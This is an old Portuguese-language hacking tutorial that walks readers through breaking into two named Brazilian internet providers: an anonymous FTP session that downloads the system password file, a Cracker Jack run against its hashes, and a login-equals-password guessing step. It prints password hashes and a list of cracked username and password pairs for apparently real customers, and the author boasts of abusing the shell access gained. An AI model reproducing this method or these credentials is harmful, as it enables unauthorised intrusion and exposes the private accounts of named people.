Hackeando Provedores...


Eu LimP BiZKiT desenvolvi um metodo simples pra hackear provedo-
res NOVOS, nao esqueca do detalhe os admins tem que ser muito bestas pra
levarem essa. Essa e' pra comecar mesmo... por isso nome do metodo e'ME-
TODO LAMER.

    \INGREDIENTES/

    1- Programa pra utilizar o FTP, um pequeno e' o FTP.EXE
       ( PORRA ISSO VEM NO RUWINDOWS )

    2- Pouco conhecimento...
       ( e' soh seguir estes passos )

    3- Paciencia
       ( coloque uma musica Hare Krishna )

    4- Desencriptador ( jack pra dos ou crack41 pra linux)
       ( ambos na pagina ou por ai... )

    5- Uma wordlist pequena ( algo bem feitinho )
       ( pretendo colocar uma worlist boa na minha pagina
         mas por enquanto vc usa a sua )

    6- Um sysadmin burro!
       ( muito muito facil de achar... )

    7- Meia hora a sua disposicao
       ( bah! )
 

Bom, vamos pegar o exemplo de um provedor onde os administradores devem
ser muito burros. Ou querem levar mesmo...
O dominio escolhido e' valleybbs.com.br
UMA BBS DE SAO JOSE DOS CAMPOS - SP ....HAHAHAHAHAHAH

 

Essa e' a sessao de FTP realizada...
Observe abaixo que nos logamos como "anonymous" e colocamos como passwd
um mail comum, pode ser "silviosantos@sbt.com.br".
Nao coloque coisas muito louca como passwd que o operador pode desconfiar.
Saiba que seu IP esta sendo logado entao o legal mesmo seria ja estar uti-
lizando uma conta hackeada.
 

C:\HACKING\ftphack>ftp

ftp> open valleybbs.com.br
Connected to valleybbs.com.br.
220 pingo FTP server (UNIX(r) System V Release 4.0) ready.
User (ginet.com.br:(none)): anonymous
331 Guest login ok, send ident as password.
Password:
230 Guest login ok, access restrictions apply.
ftp> ls -la
200 PORT command successful.
150 ASCII data connection for /bin/ls (200.???.???.??,2475) (0 bytes).
total 14
drwxr-xr-x   6 0        1            512 Nov 15 20:50 .
drwxr-xr-x   6 0        1            512 Nov 15 20:50 ..
lrwxrwxrwx   1 0        1              7 Nov 15 20:50 bin -> usr/bin
dr-xr-xr-x   2 0        1            512 Nov 15 20:50 dev
dr-xr-xr-x   2 0        1            512 Nov 15 20:50 etc
drwxrwxrwx   7 30000    1            512 Jan  8 19:19 pub
drwxr-xr-x   5 0        1            512 Nov 15 20:50 usr
226 ASCII Transfer complete.
431 bytes received in 0.60 seconds (0.72 Kbytes/sec)
ftp>
ftp> cd etc
250 CWD command successful.
ftp> ls
200 PORT command successful.
150 ASCII data connection for /bin/ls (200.???.???.??,2476) (0 bytes).
group
netconfig
passwd
226 ASCII Transfer complete.
26 bytes received in 0.00 seconds (26000.00 Kbytes/sec)
ftp>
ftp> get passwd
200 PORT command successful.
150 ASCII data connection for passwd (200.???.???.??,2477) (62 bytes).
226 ASCII Transfer complete.
63 bytes received in 0.06 seconds (1.05 Kbytes/sec)
ftp>
 

Bom! Ai ta o passwd, em alguns casos o shadow que contem as senhas en-
criptadas.

Esse e' o provedor onde os caras sao do tipo... burros demais!
Agora que temos o arquivo com as senhas o que devemos fazer? Vamos desen-
criptalas.
Usem o crackerjack se vcs estiverem rodando em ambiente DOS, lembrem-se
o cjack nao roda ao mesmo tempo que o ruindows95, entao inicie o prompt
em modo de seguranca.
Pronto, vou colocar uma sessao de crack nas senhas aqui abaixo.
 
 

Cracker Jack version 1.4 for OS/2 and DOS (386)
Copyright (C) 1993, The Jackal, Denmark

PWfile(s) : c:\raiz\contas\ginet\passwd
Wordfile  : c:\hacking\diction.ary\axur
Initializing session data...
Loaded 52 total accounts with 50 different salts.
 

Cracking... (Hit any key for status, Ctrl-C to abort)

forest    .(forest)
pinara    .(9871)

Depois de exaustivo tempo larguei de mao, porra minha worlist menor tem
3 megas e nunca pegou tao poucas senhas assim, eu uso esta lista com pa-
lavras do dicionario quando quero economizar tempo ;) pq uma lista gera-
da bem fica com no minino 600 megas.
Qual a primeira providencia que eu vou tomar?
Vou renomear o arquivo passwd e depois limpar ele, usando os proprios lo-
gins como palavras pra wordlist.

gampert
regis
pinara
rodinei
patricia
marcelo
marcos
fernando::9809::::::
debora:wu6RAjzsZPVmI:9810::::::
fredi:AOIaiY4qoNnjs:9818::::::
bstudio:I3ge9NrA610ck:9818::::::
bbborges:L2bpLO7gP7o7U:9818:::::
setup   --DEIXAR SOH O LOGIN--   :HB90Lijk05mpE:6445::::::

Vc soh deve deixar a primeira parte como eu fiz no exemplo acima.
Ai entao nos vamos tentar novamente crackear o arquivo passwd soh que
entendendo que os usuarios usam o login e a senha iguais.

Hehehe.. bingo!
Vou listar abaixo as senhas que eu peguei usando o metodo de login=senha

Provedor: ginet.com.br
login    -  senha
- - -       - - -
bstudio  -  bstudio
oab_pf   -  oab_pf
nuhry    -  nuhry
jtelles  -  jtelles
demo1    -  demo1
demo2    -  demo2
demo3    -  demo3
demo4    -  demo4
demo5    -  demo5
cmoura   -  cmoura
glaucia  -  glaucia
pedroso  -  pedroso
cotrijal -  cotrijal
ameplan  -  ameplan
guto     -  guto
jmartins -  jmartins
lguedes  -  lguedes
coopibt  -  coopibt
jferst   -  jferst

Coisa estupida ne'? Os caras usam quase todas as  senhas e logins iguais.
Agora e' soh vcs fazerem isso, mas lembrem-se e'muito dificil de achar um
provedor estupido assim. {:^)
Depois que aprontei uma no shell eles cortaram  o acesso, ainda dah
pra ler uns mails, mas nao dah pra puxar telnet.